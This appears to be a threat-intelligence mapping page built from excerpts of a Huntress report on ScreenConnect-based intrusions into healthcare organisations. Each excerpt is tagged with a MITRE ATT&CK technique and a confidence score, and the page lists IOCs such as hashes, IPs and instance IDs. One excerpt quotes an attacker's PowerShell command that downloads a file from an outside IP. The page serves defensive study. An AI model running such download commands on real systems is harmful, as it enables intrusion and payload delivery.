“…Connect instance C was used to run the following PowerShell command: powershell -command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://119.91.138[.]133:443/test.xml', 'C:\ProgramData\test.xml')". Almost 20 hours later, on…”
T1219 Remote Access Tools (93%)
“remote management of these clients to subsequent threat actor abuse. Technical Indicators of Compromise (IOCs): Huntress has identified and urges immediate action upon the following IOCs. Associated files & payloads (name, SHA256, function): test.xml, 9f42bf3a61faaab8f86abb3c7f9db41…”
T1059.001 PowerShell (80%)
“to access the endpoint via ScreenConnect instance B. There were several pairs of “connected” and “disconnected” messages in the logs for the “[redacted 1]” account until October 28, 2023. On October 28, the “[redacted 2]” account was used to access ScreenConnect insta…”
T1046 Network Service Discovery (75%)
“…973be9892305132389c8588de): a legitimate WinPcap version 4.1.3 executable. - masscan64.exe (174f91806e8bc1c0dea24192f7d4afcefc40a1731827b32939d4f411e8402d75): a compiled version of the masscan TCP port scanner. - veeam.exe (45c8716c69f56e26c98369e626e0b47d7ea5e15d3fb3…”
T1219 Remote Access Tools (71%)
“…er ScreenConnect instance IDs (ScreenConnect instance ID, description): adf02e34cba839d2, ScreenConnect instance ID B, associated with rs.tdsclinical[.]com; e3e2410d655306ff, ScreenConnect instance ID C, associated with 45.66.230[.]146; 4974c38508ef2b18, ScreenConnect instance …”
T1059.001 PowerShell (71%)
“, the file s.msi was transferred to the endpoint via the ScreenConnect instance; launching this file led to ScreenConnect instance D being installed on this endpoint, with the instance configured to connect to 185.12.45[.]98 on port 8041. It was clear that ScreenConnect in…”
T1219 Remote Access Tools (68%)
“Bitter Pill | Huntress. In a concerning development within the healthcare sector, Huntress has identified a series of unauthorized access that signifies internal reconnaissance and preparation for additional threat actor activity against multiple healthcare organizations. The atta…”
T1059.001 PowerShell (50%)
“procedures (TTPs) across both endpoints, as well as multiple intersections in indicators of compromise (IOCs). Specifically, one ScreenConnect instance (instance B) was observed being actively used on both endpoints, the “[redacted 1]” account was observed being used to…”
T1574.001 DLL (40%)
“…servables. While researching this event, Huntress analysts identified an open directory on 2.57.149[.]103, shown in the following figure. In addition to a.msi, the AnyDesk installer previously discussed, two additional files were located: - b.msi (f28ee671c0f894154dd8c…”
T1219 Remote Access Tools (36%)
“procedures (TTPs) across both endpoints, as well as multiple intersections in indicators of compromise (IOCs). Specifically, one ScreenConnect instance (instance B) was observed being actively used on both endpoints, the “[redacted 1]” account was observed being used to…”
T1219 Remote Access Tools (34%)
“zip in monitored environments makes its association with the ScreenConnect incidents uncertain. However, the payloads in question match overall observed behaviors in terms of remote access tool installation (b.msi) and payloads associated with system survey (masscan64.exe) …”
T1204.002 Malicious File (33%)
“zip in monitored environments makes its association with the ScreenConnect incidents uncertain. However, the payloads in question match overall observed behaviors in terms of remote access tool installation (b.msi) and payloads associated with system survey (masscan64.exe) …”
Summary
Huntress has uncovered a series of unauthorized access events, revealing a threat actor using ScreenConnect to infiltrate multiple healthcare organizations.